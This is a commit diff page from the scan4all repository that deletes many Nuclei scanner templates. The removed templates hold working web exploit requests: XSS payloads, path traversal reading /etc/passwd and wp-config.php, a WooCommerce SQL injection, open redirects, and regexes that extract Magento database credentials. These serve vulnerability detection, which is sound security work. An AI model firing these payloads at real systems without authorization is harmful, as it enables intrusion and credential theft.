crash.software
Projects
Pull Requests
Issues
Builds
scan4all
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY scan4all Commits a47b314c
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■
    config/nuclei-templates/51pwn/CVE-2022-1388.yaml
    1  -id: CVE-2022-1388
     1 +id: CVE-2022-1388_51pwn
    2 2   
    3 3  info:
    4 4   name: F5 BIG-IP iControl REST Auth Bypass RCE
    skipped 54 lines
  • ■ ■ ■ ■
    config/nuclei-templates/51pwn/CVE-2022-22954.yaml
    1  -id: CVE-2022-22954
     1 +id: CVE-2022-22954_51pwn
    2 2   
    3 3  info:
    4 4   name: VMware Workspace ONE Access - Server-Side Template Injection
    skipped 34 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/51pwn/rails6-xss.yaml
    1  -id: rails6-xss
    2  -info:
    3  - name: Rails CRLF XSS (6.0.0 < rails < 6.0.3.2)
    4  - author:
    5  - - l0ne1y
    6  -requests:
    7  -- matchers:
    8  - - type: word
    9  - part: body
    10  - words:
    11  - - javascript:alert(1)
    12  - - type: status
    13  - status:
    14  - - 302
    15  - - type: word
    16  - condition: and
    17  - part: header
    18  - words:
    19  - - 'Location: javascript:alert(22)'
    20  - - text/html
    21  - matchers-condition: and
    22  - redirects: false
    23  - path:
    24  - - '{{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0ajavascript:alert(22)'
    25  - method: POST
    26  - 
    27  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-32159.yaml
    1  -id: CVE-2022-32159
    2  - 
    3  -info:
    4  - name: Open edX - Cross-site Scripting
    5  - author: arafatansari
    6  - severity: medium
    7  - description: |
    8  - Open edX platform before 2022-06-06 allows Reflected Cross-site Scripting via the "next" parameter in the logout URL.
    9  - reference:
    10  - - https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408
    11  - - https://nvd.nist.gov/vuln/detail/CVE-2022-32159
    12  - - https://www.mend.io/vulnerability-database/CVE-2022-32159
    13  - - https://github.com/internetarchive/infogami/pull/195/commits/ccc2141c5fb093870c9e2742c01336ecca8cd12e
    14  - classification:
    15  - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    16  - cvss-score: 5.4
    17  - cve-id: CVE-2022-32159
    18  - cwe-id: CWE-79
    19  - metadata:
    20  - comment: Hover the cursor on the redirect link
    21  - shodan-query: http.html:"Open edX"
    22  - verified: "true"
    23  - tags: cve,cve2022,openedx,xss
    24  - 
    25  -requests:
    26  - - method: GET
    27  - path:
    28  - - '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)'
    29  - 
    30  - matchers-condition: and
    31  - matchers:
    32  - - type: word
    33  - part: body
    34  - words:
    35  - - '<a href="+8"onmouseover="alert(document.domain)">click here to go to'
    36  - 
    37  - - type: word
    38  - part: header
    39  - words:
    40  - - text/html
    41  - 
    42  - - type: status
    43  - status:
    44  - - 200
    45  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/apache/tomcat-pathnormalization.yaml
    1  -id: tomcat-manager-pathnormalization
    2  - 
    3  -info:
    4  - name: Tomcat Manager Path Normalization
    5  - author: organiccrap
    6  - severity: info
    7  - description: A Tomcat Manager login panel was discovered via path normalization. Normalizing a path involves modifying the string that identifies a path or file so that it conforms to a valid path on the target
    8  - operating system.
    9  - reference:
    10  - - https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/mitigation-path-normalization
    11  - - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
    12  - classification:
    13  - cwe-id: CWE-200
    14  - tags: panel,tomcat,apache
    15  - 
    16  -requests:
    17  - - method: GET
    18  - path:
    19  - - '{{BaseURL}}/..;/manager/html'
    20  - - '{{BaseURL}}/..;/host-manager/html'
    21  - 
    22  - matchers-condition: and
    23  - matchers:
    24  - - type: word
    25  - words:
    26  - - 'username="tomcat" password="s3cret"'
    27  - - 'manager-gui'
    28  - condition: and
    29  - 
    30  - - type: status
    31  - negative: true
    32  - status:
    33  - - 403
    34  - - 401
    35  - 
    36  -# Enhanced by mp on 2022/03/17
    37  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposures/configs/magento-config.yaml
    1  -id: magento-config
    2  - 
    3  -info:
    4  - name: Magento Config Disclosure
    5  - author: geeknik
    6  - severity: medium
    7  - metadata:
    8  - shodan-query: http.component:"Magento"
    9  - tags: config,exposure,magento
    10  - 
    11  -requests:
    12  - - method: GET
    13  - path:
    14  - - "{{BaseURL}}/app/etc/local.xml"
    15  - - "{{BaseURL}}/store/app/etc/local.xml"
    16  - 
    17  - matchers-condition: and
    18  - matchers:
    19  - - type: status
    20  - status:
    21  - - 200
    22  - 
    23  - - type: word
    24  - words:
    25  - - "text/xml"
    26  - part: header
    27  - 
    28  - - type: word
    29  - words:
    30  - - "Magento"
    31  - part: body
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposures/configs/magento-information-disclosure.yaml
    1  -id: magento-information-disclosure
    2  - 
    3  -info:
    4  - name: Magento - Information Disclosure
    5  - author: ptonewreckin,danigoland
    6  - severity: high
    7  - description: |
    8  - Misconfigured instances of Magento may disclose usernames, passwords, and database configurations via /app/etc/local.xml
    9  - reference:
    10  - - https://github.com/ptonewreckin/cmsDetector/blob/master/signatures/magento.py
    11  - metadata:
    12  - verified: true
    13  - tags: magento,exposure,credential,config
    14  - 
    15  -requests:
    16  - - method: GET
    17  - path:
    18  - - "{{BaseURL}}/app/etc/local.xml"
    19  - - "{{BaseURL}}/app/etc/local.xml.additional"
    20  - - "{{BaseURL}}/store/app/etc/local.xml"
    21  - 
    22  - stop-at-first-match: true
    23  - matchers-condition: and
    24  - matchers:
    25  - - type: word
    26  - part: body
    27  - words:
    28  - - "* Magento"
    29  - - "<dbname>"
    30  - condition: and
    31  - 
    32  - - type: word
    33  - part: header
    34  - words:
    35  - - "application/xml"
    36  - 
    37  - - type: status
    38  - status:
    39  - - 200
    40  - 
    41  - extractors:
    42  - - type: regex
    43  - part: body
    44  - group: 1
    45  - regex:
    46  - - "<host><!\\[CDATA\\[(.+)\\]\\]><\\/host>"
    47  - - "<username><!\\[CDATA\\[(.+)\\]\\]><\\/username>"
    48  - - "<password><!\\[CDATA\\[(.+)\\]\\]><\\/password>"
    49  - - "<dbname><!\\[CDATA\\[(.+)\\]\\]><\\/dbname>"
    50  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/unauthenticated-influxdb.yaml
    1  -id: unauthenticated-influxdb
    2  - 
    3  -info:
    4  - name: Unauthentication InfluxDB Detection
    5  - author: pussycat0x
    6  - severity: high
    7  - metadata:
    8  - shodan-dork: InfluxDB
    9  - tags: unauth,db,influxdb,misconfig
    10  - 
    11  -requests:
    12  - - method: GET
    13  - path:
    14  - - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
    15  -
    16  - matchers-condition: and
    17  - matchers:
    18  - - type: word
    19  - part: body
    20  - words:
    21  - - '"results":'
    22  - - '"name":"databases"'
    23  - condition: and
    24  -
    25  - - type: status
    26  - status:
    27  - - 200
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/tb.sh
    1  -myrsync ./ $HOME/MyWork/scan4all/config/nuclei-templates
    2  - 
    3  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/concrete-xss.yaml
    1  -id: concrete-xss
    2  - 
    3  -info:
    4  - name: Unauthenticated reflected XSS in preview_as_user function
    5  - author: shifacyclewla,hackergautam
    6  - severity: medium
    7  - description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter.
    8  - reference:
    9  - - https://hackerone.com/reports/643442
    10  - - https://github.com/concrete5/concrete5/pull/7999
    11  - - https://twitter.com/JacksonHHax/status/1389222207805661187
    12  - tags: concrete,xss,cms
    13  - 
    14  -requests:
    15  - - method: GET
    16  - path:
    17  - - '{{BaseURL}}/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("{{randstr}}")>'
    18  - 
    19  - matchers-condition: and
    20  - matchers:
    21  - - type: word
    22  - part: body
    23  - words:
    24  - - '</iframe><svg/onload=alert("{{randstr}}")>'
    25  - 
    26  - - type: word
    27  - part: header
    28  - words:
    29  - - "text/html"
    30  - - "CONCRETE5"
    31  - condition: and
    32  - 
    33  - - type: status
    34  - status:
    35  - - 200
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/gnuboard-sms-xss.yaml
    1  -id: gnuboard-sms-xss
    2  - 
    3  -info:
    4  - name: Gnuboard CMS - SMS Emoticon XSS
    5  - author: gy741
    6  - severity: medium
    7  - description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
    8  - reference:
    9  - - https://sir.kr/g5_pds/4788?page=5
    10  - - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
    11  - metadata:
    12  - verified: true
    13  - shodan-query: http.html:"Gnuboard"
    14  - tags: xss,gnuboard
    15  - 
    16  -requests:
    17  - - method: GET
    18  - path:
    19  - - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"
    20  - 
    21  - matchers-condition: and
    22  - matchers:
    23  - - type: word
    24  - part: body
    25  - words:
    26  - - '"0nuboard<svg onload=alert(document.domain)>"'
    27  - 
    28  - - type: word
    29  - part: header
    30  - words:
    31  - - "text/html"
    32  - 
    33  - - type: status
    34  - status:
    35  - - 200
    36  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/accessibility-helper-xss.yaml
    1  -id: accessibility-helper-xss
    2  - 
    3  -info:
    4  - name: WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS)
    5  - author: dhiyaneshDK
    6  - severity: medium
    7  - description: The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue.
    8  - reference:
    9  - - https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5
    10  - tags: xss,wordpress,wp-plugin,wp
    11  - 
    12  -requests:
    13  - - method: GET
    14  - path:
    15  - - '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
    16  - 
    17  - matchers-condition: and
    18  - matchers:
    19  - - type: word
    20  - part: body
    21  - words:
    22  - - "var wah_target_src = '';alert(document.domain);//';"
    23  - 
    24  - - type: word
    25  - part: header
    26  - words:
    27  - - text/html
    28  - 
    29  - - type: status
    30  - status:
    31  - - 200
    32  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml
    1  -id: admin-word-count-column-lfi
    2  - 
    3  -info:
    4  - name: WordPress Admin Word Count Column 2.2 - Local File Inclusion
    5  - author: daffainfo,Splint3r7
    6  - severity: high
    7  - description: WordPress Admin Word Count Column 2.2 is vulnerable to local file inclusion.
    8  - reference:
    9  - - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
    10  - - https://wordpress.org/plugins/admin-word-count-column/
    11  - remediation: This plugin has been closed as of March 29, 2022 and is not available for download.
    12  - classification:
    13  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    14  - cvss-score: 7.5
    15  - cwe-id: CWE-22
    16  - tags: wordpress,wp-plugin,lfi,wp
    17  - 
    18  -requests:
    19  - - method: GET
    20  - path:
    21  - - '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
    22  - 
    23  - matchers-condition: and
    24  - matchers:
    25  - - type: regex
    26  - regex:
    27  - - "root:[x*]:0:0"
    28  - 
    29  - - type: status
    30  - status:
    31  - - 200
    32  - 
    33  -# Enhanced by mp on 2022/08/01
    34  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml
    1  -id: cab-fare-calculator-lfi
    2  - 
    3  -info:
    4  - name: WordPress Cab fare calculator 1.0.3 - Local File Inclusion
    5  - author: Hassan Khan Yusufzai - Splint3r7
    6  - severity: high
    7  - description: WordPress Cab fare calculator 1.0.3 is vulnerable to local file inclusion.
    8  - reference:
    9  - - https://www.exploit-db.com/exploits/50843
    10  - - https://wordpress.org/plugins/cab-fare-calculator
    11  - classification:
    12  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    13  - cvss-score: 7.5
    14  - cwe-id: CWE-22
    15  - tags: wordpress,wp-plugin,lfi,wp
    16  - 
    17  -requests:
    18  - - method: GET
    19  - path:
    20  - - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1'
    21  - 
    22  - matchers-condition: and
    23  - matchers:
    24  - - type: regex
    25  - regex:
    26  - - "root:[x*]:0:0"
    27  - 
    28  - - type: status
    29  - status:
    30  - - 200
    31  - 
    32  -# Enhanced by mp on 2022/08/01
    33  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/candidate-application-lfi.yaml
    1  -id: candidate-application-lfi
    2  - 
    3  -info:
    4  - name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion
    5  - author: dhiyaneshDK
    6  - severity: high
    7  - description: WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
    8  - reference:
    9  - - https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
    10  - classification:
    11  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    12  - cvss-score: 8.6
    13  - cwe-id: CWE-22
    14  - tags: wordpress,wp-plugin,lfi,wp
    15  - 
    16  -requests:
    17  - - method: GET
    18  - path:
    19  - - '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'
    20  - 
    21  - matchers-condition: and
    22  - matchers:
    23  - - type: regex
    24  - regex:
    25  - - "root:[x*]:0:0"
    26  - 
    27  - - type: status
    28  - status:
    29  - - 200
    30  - 
    31  -# Enhanced by mp on 2022/04/21
    32  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/db-backup-lfi.yaml
    1  -id: db-backup-lfi
    2  - 
    3  -info:
    4  - name: WordPress DB Backup <=4.5 - Local File Inclusion
    5  - author: dhiyaneshDK
    6  - severity: high
    7  - description: WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
    8  - reference:
    9  - - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
    10  - - https://www.exploit-db.com/exploits/35378
    11  - classification:
    12  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    13  - cvss-score: 7.5
    14  - cwe-id: CWE-22
    15  - tags: wordpress,wp-plugin,lfi,wp
    16  - 
    17  -requests:
    18  - - method: GET
    19  - path:
    20  - - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
    21  - 
    22  - matchers-condition: and
    23  - matchers:
    24  - - type: word
    25  - part: body
    26  - words:
    27  - - "DB_NAME"
    28  - - "DB_PASSWORD"
    29  - condition: and
    30  - 
    31  - - type: status
    32  - status:
    33  - - 200
    34  - 
    35  -# Enhanced by mp on 2022/08/05
    36  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/feedwordpress-xss.yaml
    1  -id: feedwordpress-xss
    2  - 
    3  -info:
    4  - name: FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS)
    5  - author: dhiyaneshDk
    6  - severity: medium
    7  - description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
    8  - reference:
    9  - - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
    10  - tags: wordpress,wp-plugin,xss,feedwordpress,authenticated
    11  - 
    12  -requests:
    13  - - raw:
    14  - - |
    15  - POST /wp-login.php HTTP/1.1
    16  - Host: {{Hostname}}
    17  - Origin: {{RootURL}}
    18  - Content-Type: application/x-www-form-urlencoded
    19  - Cookie: wordpress_test_cookie=WP%20Cookie%20check
    20  - 
    21  - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
    22  - - |
    23  - GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
    24  - Host: {{Hostname}}
    25  - 
    26  - cookie-reuse: true
    27  - matchers-condition: and
    28  - matchers:
    29  - - type: word
    30  - part: body
    31  - words:
    32  - - '"><img src=2 onerror=alert(document.domain)>" method="post">'
    33  - 
    34  - - type: word
    35  - part: header
    36  - words:
    37  - - text/html
    38  - 
    39  - - type: status
    40  - status:
    41  - - 200
    42  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
    1  -id: newsletter-manager-open-redirect
    2  - 
    3  -info:
    4  - name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect
    5  - author: akincibor
    6  - severity: low
    7  - description: |
    8  - The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.
    9  - reference:
    10  - - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
    11  - metadata:
    12  - verified: true
    13  - tags: wp-plugin,redirect,wordpress,wp,unauth
    14  - 
    15  -requests:
    16  - - method: GET
    17  - path:
    18  - - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo"
    19  - 
    20  - matchers:
    21  - - type: regex
    22  - part: header
    23  - regex:
    24  - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
    25  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/ninjaform-open-redirect.yaml
    1  -id: ninjaform-open-redirect
    2  - 
    3  -info:
    4  - name: Ninja Forms < 3.4.34 - Administrator Open Redirect
    5  - author: dhiyaneshDk,daffainfo
    6  - severity: low
    7  - description: The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
    8  - reference:
    9  - - https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818
    10  - tags: wordpress,redirect,wp-plugin,ninjaform,authenticated,wp
    11  - 
    12  -requests:
    13  - - raw:
    14  - - |
    15  - POST /wp-login.php HTTP/1.1
    16  - Host: {{Hostname}}
    17  - Origin: {{RootURL}}
    18  - Content-Type: application/x-www-form-urlencoded
    19  - Cookie: wordpress_test_cookie=WP%20Cookie%20check
    20  - 
    21  - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
    22  - 
    23  - - |
    24  - GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1
    25  - Host: {{Hostname}}
    26  - 
    27  - req-condition: true
    28  - cookie-reuse: true
    29  - matchers:
    30  - - type: dsl
    31  - dsl:
    32  - - 'status_code_1 == 302'
    33  - - 'status_code_2 == 302'
    34  - - "contains(all_headers_2, 'Location: https://interact.sh?client_id=1')"
    35  - condition: and
    36  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml
    1  -id: simple-image-manipulator-lfi
    2  - 
    3  -info:
    4  - name: WordPress Simple Image Manipulator 1.0 - Local File Inclusion
    5  - author: dhiyaneshDK
    6  - severity: high
    7  - description: WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.
    8  - reference:
    9  - - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
    10  - classification:
    11  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    12  - cvss-score: 7.5
    13  - cwe-id: CWE-22
    14  - tags: wordpress,wp-plugin,lfi,wp
    15  - 
    16  -requests:
    17  - - method: GET
    18  - path:
    19  - - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
    20  - 
    21  - matchers-condition: and
    22  - matchers:
    23  - - type: regex
    24  - regex:
    25  - - "root:[x*]:0:0"
    26  - 
    27  - - type: status
    28  - status:
    29  - - 200
    30  - 
    31  -# Enhanced by mp on 2022/07/29
    32  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/sniplets-lfi.yaml
    1  -id: sniplets-lfi
    2  - 
    3  -info:
    4  - name: WordPress Sniplets 1.1.2 - Local File Inclusion
    5  - author: dhiyaneshDK
    6  - severity: high
    7  - description: WordPress Sniplets 1.1.2 is vulnerable to local file inclusion.
    8  - reference:
    9  - - https://www.exploit-db.com/exploits/5194
    10  - classification:
    11  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    12  - cvss-score: 7.5
    13  - cwe-id: CWE-22
    14  - tags: wordpress,wp-plugin,lfi,wp
    15  - 
    16  -requests:
    17  - - method: GET
    18  - path:
    19  - - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
    20  - 
    21  - matchers-condition: and
    22  - matchers:
    23  - - type: word
    24  - part: body
    25  - words:
    26  - - "DB_NAME"
    27  - - "DB_PASSWORD"
    28  - condition: and
    29  - 
    30  - - type: status
    31  - status:
    32  - - 200
    33  - 
    34  -# Enhanced by mp on 2022/07/29
    35  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/sniplets-xss.yaml
    1  -id: sniplets-xss
    2  - 
    3  -info:
    4  - name: Wordpress Plugin Sniplets - Cross-Site Scripting
    5  - author: dhiyaneshDK
    6  - severity: medium
    7  - description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets
    8  - reference:
    9  - - https://www.exploit-db.com/exploits/5194
    10  - tags: xss,wordpress,wp-plugin,wp
    11  - 
    12  -requests:
    13  - - method: GET
    14  - path:
    15  - - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
    16  - 
    17  - matchers-condition: and
    18  - matchers:
    19  - - type: word
    20  - part: body
    21  - words:
    22  - - "</script><script>alert(document.domain)</script>"
    23  - 
    24  - - type: word
    25  - part: header
    26  - words:
    27  - - text/html
    28  - 
    29  - - type: status
    30  - status:
    31  - - 200
    32  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml
    1  -id: video-synchro-pdf-lfi
    2  - 
    3  -info:
    4  - name: WordPress Videos sync PDF 1.7.4 - Local File Inclusion
    5  - author: Hassan Khan Yusufzai - Splint3r7
    6  - severity: high
    7  - description: WordPress Videos sync PDF 1.7.4 is vulnerable to local file inclusion.
    8  - reference:
    9  - - https://www.exploit-db.com/exploits/50844
    10  - - https://wordpress.org/plugins/video-synchro-pdf/
    11  - classification:
    12  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    13  - cvss-score: 7.5
    14  - cwe-id: CWE-22
    15  - tags: wordpress,wp-plugin,lfi,wp
    16  - 
    17  -requests:
    18  - - method: GET
    19  - path:
    20  - - '{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00'
    21  - 
    22  - matchers-condition: and
    23  - matchers:
    24  - - type: regex
    25  - regex:
    26  - - "root:[x*]:0:0"
    27  - 
    28  - - type: status
    29  - status:
    30  - - 200
    31  - 
    32  -# Enhanced by mp on 2022/07/29
    33  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
    1  -id: wordpress-woocommerce-sqli
    2  - 
    3  -info:
    4  - name: Woocommerce Unauthenticated SQL Injection
    5  - author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot
    6  - severity: critical
    7  - description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability.
    8  - reference:
    9  - - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
    10  - - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
    11  - - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/
    12  - classification:
    13  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    14  - cvss-score: 10.0
    15  - cwe-id: CWE-89
    16  - tags: wordpress,woocommerce,sqli,wp-plugin,injection
    17  - 
    18  -requests:
    19  - - method: GET
    20  - path:
    21  - - '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
    22  - - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
    23  - 
    24  - matchers-condition: and
    25  - matchers:
    26  - - type: word
    27  - words:
    28  - - 'sqli-test'
    29  - - 'attribute_counts'
    30  - - 'price_range'
    31  - - 'term'
    32  - condition: and
    33  - 
    34  - - type: word
    35  - words:
    36  - - 'application/json'
    37  - part: header
    38  - 
    39  - - type: status
    40  - status:
    41  - - 200
    42  - 
    43  -# Enhanced by mp on 2022/03/21
    44  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/wp-church-admin-xss.yaml
    1  -id: wp-church-admin-xss
    2  - 
    3  -info:
    4  - name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS)
    5  - author: daffainfo
    6  - severity: medium
    7  - reference:
    8  - - https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html
    9  - tags: wordpress,xss,wp-plugin
    10  - 
    11  -requests:
    12  - - method: GET
    13  - path:
    14  - - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
    15  - 
    16  - matchers-condition: and
    17  - matchers:
    18  - - type: word
    19  - words:
    20  - - "</script><script>alert(document.domain)</script>"
    21  - part: body
    22  - 
    23  - - type: word
    24  - part: header
    25  - words:
    26  - - text/html
    27  - 
    28  - - type: status
    29  - status:
    30  - - 200
    31  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/wp-revslider-file-download.yaml
    1  -id: wp-revslider-file-download
    2  - 
    3  -info:
    4  - name: Wordpress Revslider - Local File Inclusion
    5  - author: pussycat0x
    6  - severity: high
    7  - description: WordPress Revslider is affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file.
    8  - reference:
    9  - - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
    10  - - https://cxsecurity.com/issue/WLB-2021090129
    11  - classification:
    12  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    13  - cvss-score: 7.5
    14  - cwe-id: CWE-22
    15  - metadata:
    16  - google-dork: inurl:/wp-content/plugins/revslider
    17  - tags: wordpress,wp-plugin,lfi,revslider
    18  - 
    19  -requests:
    20  - - method: GET
    21  - path:
    22  - - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
    23  - - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
    24  - 
    25  - matchers-condition: and
    26  - matchers:
    27  - - type: word
    28  - part: body
    29  - words:
    30  - - "'DB_NAME'"
    31  - - "'DB_PASSWORD'"
    32  - - "'DB_USER'"
    33  - condition: and
    34  - 
    35  - - type: status
    36  - status:
    37  - - 200
    38  - 
    39  -# Enhanced by mp on 2022/07/29
    40  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/wp-whmcs-xss.yaml
    1  -id: wp-whmcs-xss
    2  - 
    3  -info:
